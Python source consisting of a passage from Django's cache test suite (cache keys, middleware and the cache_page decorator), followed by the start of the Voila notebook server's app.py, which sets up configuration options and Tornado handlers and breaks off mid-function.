request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response.headers['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response.headers['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
tz = timezone.get_current_timezone_name()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = timezone.get_current_timezone_name()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
def get_response(req):
return HttpResponse(msg)
translation.activate(lang)
return UpdateCacheMiddleware(get_response)(request)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
content = 'Check for cache with QUERY_STRING'
def get_response(req):
return HttpResponse(content)
UpdateCacheMiddleware(get_response)(request)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
# The cache can be recovered
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
def get_stream_response(req):
return StreamingHttpResponse(['Check for cache with streaming content.'])
UpdateCacheMiddleware(get_stream_response)(request)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(SimpleTestCase):
factory = RequestFactory()
def setUp(self):
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super().tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If only one argument is passed in construction, it's being used as
# middleware.
middleware = CacheMiddleware(empty_response)
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
self.assertEqual(middleware.cache, self.other_cache)
# If more arguments are being passed in construction, it's being used
# as a decorator. First, test with "defaults":
as_view_decorator = CacheMiddleware(empty_response, cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
# Value of DEFAULT_CACHE_ALIAS from django.core.cache
self.assertEqual(as_view_decorator.cache_alias, 'default')
self.assertEqual(as_view_decorator.cache, self.default_cache)
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(
hello_world_view, cache_timeout=60, cache_alias='other', key_prefix='foo'
)
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
self.assertEqual(as_view_decorator_with_custom.cache, self.other_cache)
def test_update_cache_middleware_constructor(self):
middleware = UpdateCacheMiddleware(empty_response)
self.assertEqual(middleware.cache_timeout, 30)
self.assertIsNone(middleware.page_timeout)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
self.assertEqual(middleware.cache, self.other_cache)
def test_fetch_cache_middleware_constructor(self):
middleware = FetchFromCacheMiddleware(empty_response)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
self.assertEqual(middleware.cache, self.other_cache)
def test_middleware(self):
middleware = CacheMiddleware(hello_world_view)
prefix_middleware = CacheMiddleware(hello_world_view, key_prefix='prefix1')
timeout_middleware = CacheMiddleware(hello_world_view, cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_cache_page_timeout(self):
# Page timeout takes precedence over the "max-age" section of the
# "Cache-Control".
tests = [
(1, 3), # max_age < page_timeout.
(3, 1), # max_age > page_timeout.
]
for max_age, page_timeout in tests:
with self.subTest(max_age=max_age, page_timeout=page_timeout):
view = cache_page(timeout=page_timeout)(
cache_control(max_age=max_age)(hello_world_view)
)
request = self.factory.get('/view/')
response = view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
time.sleep(1)
response = view(request, '2')
self.assertEqual(
response.content,
b'Hello World 1' if page_timeout > max_age else b'Hello World 2',
)
cache.clear()
def test_cached_control_private_not_cached(self):
"""Responses with 'Cache-Control: private' are not cached."""
view_with_private_cache = cache_page(3)(cache_control(private=True)(hello_world_view))
request = self.factory.get('/view/')
response = view_with_private_cache(request, '1')
self.assertEqual(response.content, b'Hello World 1')
response = view_with_private_cache(request, '2')
self.assertEqual(response.content, b'Hello World 2')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
request = self.factory.get('/view/')
csrf_middleware = CsrfViewMiddleware(csrf_view)
csrf_middleware.process_view(request, csrf_view, (), {})
cache_middleware = CacheMiddleware(csrf_middleware)
self.assertIsNone(cache_middleware.process_request(request))
cache_middleware(request)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
def test_304_response_has_http_caching_headers_but_not_cached(self):
original_view = mock.Mock(return_value=HttpResponseNotModified())
view = cache_page(2)(original_view)
request = self.factory.get('/view/')
# The view shouldn't be cached on the second call.
view(request).close()
response = view(request)
response.close()
self.assertEqual(original_view.call_count, 2)
self.assertIsInstance(response, HttpResponseNotModified)
self.assertIn('Cache-Control', response)
self.assertIn('Expires', response)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(SimpleTestCase):
"""
Tests various headers w/ TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway but the ETag header is 'special' because it relies on the
content being complete (which is not necessarily always the case
with a TemplateResponse)
"""
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response.headers['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response.headers['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
class TestMakeTemplateFragmentKey(SimpleTestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key, 'template.cache.foo.493e283d571a73056196f1a68efd0f66')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key, 'template.cache.bar.17c1a507a0cb58384f4c639067a93520')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key, 'template.cache.spam.06c8ae8e8c430b69fb0a6443504153dc')
def test_with_ints_vary_on(self):
key = make_template_fragment_key('foo', [1, 2, 3, 4, 5])
self.assertEqual(key, 'template.cache.foo.7ae8fd2e0d25d651c683bdeebdb29461')
def test_with_unicode_vary_on(self):
key = make_template_fragment_key('foo', ['42º', '😀'])
self.assertEqual(key, 'template.cache.foo.7ced1c94e543668590ba39b3c08b0237')
def test_long_vary_on(self):
key = make_template_fragment_key('foo', ['x' * 10000])
self.assertEqual(key, 'template.cache.foo.3670b349b5124aa56bdb50678b02b23a')
class CacheHandlerTest(SimpleTestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
def test_nonexistent_alias(self):
msg = "The connection 'nonexistent' doesn't exist."
with self.assertRaisesMessage(InvalidCacheBackendError, msg):
caches['nonexistent']
def test_nonexistent_backend(self):
test_caches = CacheHandler({
'invalid_backend': {
'BACKEND': 'django.nonexistent.NonexistentBackend',
},
})
msg = (
"Could not find backend 'django.nonexistent.NonexistentBackend': "
"No module named 'django.nonexistent'"
)
with self.assertRaisesMessage(InvalidCacheBackendError, msg):
test_caches['invalid_backend']
def test_all(self):
test_caches = CacheHandler({
'cache_1': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
},
'cache_2': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
},
})
self.assertEqual(test_caches.all(initialized_only=True), [])
cache_1 = test_caches['cache_1']
self.assertEqual(test_caches.all(initialized_only=True), [cache_1])
self.assertEqual(len(test_caches.all()), 2)
# .all() initializes all caches.
self.assertEqual(len(test_caches.all(initialized_only=True)), 2)
self.assertEqual(test_caches.all(), test_caches.all(initialized_only=True))
|
app.py
|
#############################################################################
# Copyright (c) 2018, Voila Contributors #
# Copyright (c) 2018, QuantStack #
# #
# Distributed under the terms of the BSD 3-Clause License. #
# #
# The full license is in the file LICENSE, distributed with this software. #
#############################################################################
from zmq.eventloop import ioloop
import gettext
import io
import logging
import threading
import tempfile
import os
import shutil
import signal
import socket
import webbrowser
import errno
import random
try:
from urllib.parse import urljoin
from urllib.request import pathname2url
except ImportError:
from urllib import pathname2url
from urlparse import urljoin
import jinja2
import tornado.ioloop
import tornado.web
from traitlets.config.application import Application
from traitlets import Unicode, Integer, Bool, Dict, List, default
from jupyter_server.services.kernels.kernelmanager import MappingKernelManager
from jupyter_server.services.kernels.handlers import KernelHandler, ZMQChannelsHandler
from jupyter_server.services.contents.largefilemanager import LargeFileManager
from jupyter_server.base.handlers import path_regex
from jupyter_server.utils import url_path_join
from jupyter_server.services.config import ConfigManager
from jupyter_server.base.handlers import FileFindHandler
from jupyter_client.kernelspec import KernelSpecManager
from jupyter_core.paths import jupyter_config_path, jupyter_path
from ipython_genutils.py3compat import getcwd
from .paths import ROOT, STATIC_ROOT, collect_template_paths
from .handler import VoilaHandler
from .treehandler import VoilaTreeHandler
from ._version import __version__
from .static_file_handler import MultiStaticFileHandler, WhiteListFileHandler
from .configuration import VoilaConfiguration
from .execute import VoilaExecutePreprocessor
from .exporter import VoilaExporter
from .csspreprocessor import VoilaCSSPreprocessor
ioloop.install()
_kernel_id_regex = r"(?P<kernel_id>\w+-\w+-\w+-\w+-\w+)"
def _(x):
return x
class Voila(Application):
name = 'voila'
version = __version__
examples = 'voila example.ipynb --port 8888'
flags = {
'debug': ({'Voila': {'log_level': logging.DEBUG}}, _("Set the log level to logging.DEBUG")),
'no-browser': ({'Voila': {'open_browser': False}}, _('Don\'t open the notebook in a browser after startup.'))
}
description = Unicode(
"""voila [OPTIONS] NOTEBOOK_FILENAME
This launches a stand-alone server for read-only notebooks.
"""
)
option_description = Unicode(
"""
notebook_path:
File name of the Jupyter notebook to display.
"""
)
notebook_filename = Unicode()
port = Integer(
8866,
config=True,
help=_(
'Port of the voila server. Default 8866.'
)
)
autoreload = Bool(
False,
config=True,
help=_(
'Will autoreload to server and the page when a template, js file or Python code changes'
)
)
root_dir = Unicode(config=True, help=_('The directory to use for notebooks.'))
static_root = Unicode(
STATIC_ROOT,
config=True,
help=_(
'Directory holding static assets (HTML, JS and CSS files).'
)
)
aliases = {
'port': 'Voila.port',
'static': 'Voila.static_root',
'strip_sources': 'VoilaConfiguration.strip_sources',
'autoreload': 'Voila.autoreload',
'template': 'VoilaConfiguration.template',
'theme': 'VoilaConfiguration.theme',
'base_url': 'Voila.base_url',
'server_url': 'Voila.server_url',
'enable_nbextensions': 'VoilaConfiguration.enable_nbextensions'
}
classes = [
VoilaConfiguration,
VoilaExecutePreprocessor,
VoilaExporter,
VoilaCSSPreprocessor
]
connection_dir_root = Unicode(
config=True,
help=_(
'Location of temporry connection files. Defaults '
'to system `tempfile.gettempdir()` value.'
)
)
connection_dir = Unicode()
base_url = Unicode(
'/',
config=True,
help=_(
'Path for voila API calls. If server_url is unset, this will be \
used for both the base route of the server and the client. \
If server_url is set, the server will server the routes prefixed \
by server_url, while the client will prefix by base_url (this is \
useful in reverse proxies).'
)
)
server_url = Unicode(
None,
config=True,
allow_none=True,
help=_(
'Path to prefix to voila API handlers. Leave unset to default to base_url'
)
)
notebook_path = Unicode(
None,
config=True,
allow_none=True,
help=_(
'path to notebook to serve with voila'
)
)
nbconvert_template_paths = List(
[],
config=True,
help=_(
'path to nbconvert templates'
)
)
template_paths = List(
[],
allow_none=True,
config=True,
help=_(
'path to nbconvert templates'
)
)
static_paths = List(
[STATIC_ROOT],
config=True,
help=_(
'paths to static assets'
)
)
port_retries = Integer(50, config=True,
help=_("The number of additional ports to try if the specified port is not available.")
)
ip = Unicode('localhost', config=True,
help=_("The IP address the notebook server will listen on."))
open_browser = Bool(True, config=True,
help=_("""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
"""))
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webbrowser_open_new = Integer(2, config=True,
help=_("""Specify Where to open the notebook on startup. This is the
`new` argument passed to the standard library method `webbrowser.open`.
The behaviour is not guaranteed, but depends on browser support. Valid
values are:
- 2 opens a new tab,
- 1 opens a new window,
- 0 opens in an existing window.
See the `webbrowser.open` documentation for details.
"""))
custom_display_url = Unicode(u'', config=True,
help=_("""Override URL shown to users.
Replace actual URL, including protocol, address, port and base URL,
with the given value when displaying URL to the users. Do not change
the actual connection URL. If authentication token is enabled, the
token is added to the custom URL automatically.
This option is intended to be used when the URL to display to the user
cannot be determined reliably by the Jupyter notebook server (proxified
or containerized setups for example)."""))
@property
def display_url(self):
if self.custom_display_url:
url = self.custom_display_url
if not url.endswith('/'):
url += '/'
else:
if self.ip in ('', '0.0.0.0'):
ip = "%s" % socket.gethostname()
else:
ip = self.ip
url = self._url(ip)
# TODO: do we want to have the token?
# if self.token:
# # Don't log full token if it came from config
# token = self.token if self._token_generated else '...'
# url = (url_concat(url, {'token': token})
# + '\n or '
# + url_concat(self._url('127.0.0.1'), {'token': token}))
return url
@property
def connection_url(self):
ip = self.ip if self.ip else 'localhost'
return self._url(ip)
def _url(self, ip):
# TODO: https / certfile
# proto = 'https' if self.certfile else 'http'
proto = 'http'
return "%s://%s:%i%s" % (proto, ip, self.port, self.base_url)
config_file_paths = List(
Unicode(),
config=True,
help=_(
'Paths to search for voila.(py|json)'
)
)
tornado_settings = Dict(
{},
config=True,
help=_(
'Extra settings to apply to tornado application, e.g. headers, ssl, etc'
)
)
@default('config_file_paths')
def _config_file_paths_default(self):
return [os.getcwd()] + jupyter_config_path()
@default('connection_dir_root')
def _default_connection_dir(self):
connection_dir = tempfile.gettempdir()
self.log.info('Using %s to store connection files' % connection_dir)
return connection_dir
@default('log_level')
def _default_log_level(self):
return logging.INFO
# similar to NotebookApp, except no extra path
@property
def nbextensions_path(self):
"""The path to look for Javascript notebook extensions"""
path = jupyter_path('nbextensions')
# FIXME: remove IPython nbextensions path after a migration period
try:
from IPython.paths import get_ipython_dir
except ImportError:
pass
else:
path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
return path
@default('root_dir')
def _default_root_dir(self):
if self.notebook_path:
return os.path.dirname(os.path.abspath(self.notebook_path))
else:
return getcwd()
def initialize(self, argv=None):
self.log.debug("Searching path %s for config files", self.config_file_paths)
# to make config_file_paths settable via cmd line, we first need to parse it
super(Voila, self).initialize(argv)
if len(self.extra_args) == 1:
arg = self.extra_args[0]
# I am not sure why we need to check if self.notebook_path is set, can we get rid of this?
if not self.notebook_path:
if os.path.isdir(arg):
self.root_dir = arg
elif os.path.isfile(arg):
self.notebook_path = arg
else:
raise ValueError('argument is neither a file nor a directory: %r' % arg)
elif len(self.extra_args) != 0:
raise ValueError('provided more than 1 argument: %r' % self.extra_args)
# then we load the config
self.load_config_file('voila', path=self.config_file_paths)
# but that cli config has preference, so we overwrite with that
self.update_config(self.cli_config)
# common configuration options between the server extension and the application
self.voila_configuration = VoilaConfiguration(parent=self)
self.setup_template_dirs()
signal.signal(signal.SIGTERM, self._handle_signal_stop)
def setup_template_dirs(self):
if self.voila_configuration.template:
collect_template_paths(
self.nbconvert_template_paths,
self.static_paths,
self.template_paths,
self.voila_configuration.template)
self.log.debug('using template: %s', self.voila_configuration.template)
self.log.debug('nbconvert template paths:\n\t%s', '\n\t'.join(self.nbconvert_template_paths))
self.log.debug('template paths:\n\t%s', '\n\t'.join(self.template_paths))
self.log.debug('static paths:\n\t%s', '\n\t'.join(self.static_paths))
if self.notebook_path and not os.path.exists(self.notebook_path):
raise ValueError('Notebook not found: %s' % self.notebook_path)
def _handle_signal_stop(self, sig, frame):
self.log.info('Handle signal %s.' % sig)
self.ioloop.add_callback_from_signal(self.ioloop.stop)
def start(self):
self.connection_dir = tempfile.mkdtemp(
prefix='voila_',
dir=self.connection_dir_root
)
self.log.info('Storing connection files in %s.' % self.connection_dir)
self.log.info('Serving static files from %s.' % self.static_root)
self.kernel_spec_manager = KernelSpecManager(
parent=self
)
self.kernel_manager = MappingKernelManager(
parent=self,
connection_dir=self.connection_dir,
kernel_spec_manager=self.kernel_spec_manager,
allowed_message_types=[
'comm_msg',
'comm_info_request',
'kernel_info_request',
'shutdown_request'
]
)
jenv_opt = {"autoescape": True} # we might want extra options via cmd line like notebook server
env = jinja2.Environment(loader=jinja2.FileSystemLoader(self.template_paths), extensions=['jinja2.ext.i18n'], **jenv_opt)
nbui = gettext.translation('nbui', localedir=os.path.join(ROOT, 'i18n'), fallback=True)
env.install_gettext_translations(nbui, newstyle=False)
self.contents_manager = LargeFileManager(parent=self)
# we create a config manager that load both the serverconfig and nbconfig (classical notebook)
read_config_path = [os.path.join(p, 'serverconfig') for p in jupyter_config_path()]
read_config_path += [os.path.join(p, 'nbconfig') for p in jupyter_config_path()]
self.config_manager = ConfigManager(parent=self, read_config_path=read_config_path)
# default server_url to base_url
self.server_url = self.server_url or self.base_url
self.app = tornado.web.Application(
base_url=self.base_url,
server_url=self.server_url or self.base_url,
kernel_manager=self.kernel_manager,
kernel_spec_manager=self.kernel_spec_manager,
allow_remote_access=True,
autoreload=self.autoreload,
voila_jinja2_env=env,
jinja2_env=env,
static_path='/',
server_root_dir='/',
contents_manager=self.contents_manager,
config_manager=self.config_manager
)
self.app.settings.update(self.tornado_settings)
handlers = []
handlers.extend([
(url_path_join(self.server_url, r'/api/kernels/%s' % _kernel_id_regex), KernelHandler),
(url_path_join(self.server_url, r'/api/kernels/%s/channels' % _kernel_id_regex), ZMQChannelsHandler),
(
url_path_join(self.server_url, r'/voila/static/(.*)'),
MultiStaticFileHandler,
{
'paths': self.static_paths,
'default_filename': 'index.html'
}
)
])
# Serving notebook extensions
if self.voila_configuration.enable_nbextensions:
handlers.append(
(
url_path_join(self.server_url, r'/voila/nbextensions/(.*)'),
FileFindHandler,
{
'path': self.nbextensions_path,
'no_cache_paths': ['/'], # don't cache anything in nbextensions
},
)
)
handlers.append(
(
url_path_join(self.server_url, r'/voila/files/(.*)'),
WhiteListFileHandler,
{
'whitelist': self.voila_configuration.file_whitelist,
'blacklist': self.voila_configuration.file_blacklist,
'path': self.root_dir,
},
)
)
tree_handler_conf = {
'voila_configuration': self.voila_configuration
}
if self.notebook_path:
handlers.append((
url_path_join(self.server_url, r'/(.*)'),
VoilaHandler,
{
'notebook_path': os.path.relpath(self.notebook_path, self.root_dir),
'nbconvert_template_paths': self.nbconvert_template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}
))
else:
self.log.debug('serving directory: %r', self.root_dir)
handlers.extend([
(self.server_url, VoilaTreeHandler, tree_handler_conf),
(url_path_join(self.server_url, r'/voila/tree' + path_regex), VoilaTreeHandler, tree_handler_conf),
(url_path_join(self.server_url, r'/voila/render/(.*)'), VoilaHandler,
{
'nbconvert_template_paths': self.nbconvert_template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}),
])
self.app.add_handlers('.*$', handlers)
self.listen()
def stop(self):
shutil.rmtree(self.connection_dir)
self.kernel_manager.shutdown_all()
def random_ports(self, port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield max(1, port + random.randint(-2*n, 2*n))
def listen(self):
for port in self.random_ports(self.port, self.port_retries+1):
try:
self.app.listen(port)
self.port = port
self.log.info('Voila is running at:\n%s' % self.display_url)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.info(_('The port %i is already in use, trying another port.') % port)
continue
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
